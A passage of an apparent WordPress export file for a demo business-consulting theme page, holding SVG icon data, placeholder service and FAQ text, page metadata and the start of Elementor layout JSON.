7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>	        
				<h5><a href="#">Natural Resources</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
			<h6>how we help</h6>		
			<h3>Align Costs with Strategy & Focus on Growth</h3>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts/">get in touch</a>
			<h4>How It Works & How We Do It</h4>		
		<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
	        <h6>CORPORATE MANAGEMENT</h6>			
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h4>Business Planning & Strategy</h4>		
				In what areas do you provide management consulting? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				In which countries do you provide consulting services? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				How is a consulting project started and organized? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>977</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:25:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:25:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consulting]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2c774f8","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6bc8536","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"ed430ae","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"017708c","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"f67d26f","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"977088c","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9348f7e","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"786190f","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left